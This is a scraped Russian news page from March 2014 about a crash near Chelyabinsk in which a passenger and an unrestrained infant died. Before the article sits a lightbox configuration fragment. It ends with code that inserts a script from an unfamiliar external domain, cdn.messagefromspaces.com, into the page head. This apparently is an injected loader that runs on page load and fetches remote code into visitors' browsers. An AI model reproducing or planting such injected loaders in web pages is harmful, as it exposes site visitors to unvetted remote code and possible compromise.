, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Врачи не смогли спасти младенца, попавшего в ДТП под Челябинском

Серьезная авария произошла вчера, 30 марта, на территории Сосновского района. Водитель автомобиля ВАЗ в условиях снегопада и гололедицы не справился с управлением, после чего отечественный автомобиль вылетел на «встречку» и столкнулся с иномаркой.

В результате пассажирка ВАЗа - жительница Свердловской области – погибла на месте происшествия. Водитель машины и младенец 2013 года рождения были доставлены в больницу на машине скорой помощи. Несмотря на все усилия врачей, спустя пять часов малыш скончался от полученных повреждений. О здоровье водителя пока ничего не известно. Отметим, что ребенок перевозился в машине без специального удерживающего устройства.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
12:05 - 31 марта 2014
|
автор: U-RSS
|
(452)
|
(0)

Комментарии (0)

Я человек
Я бот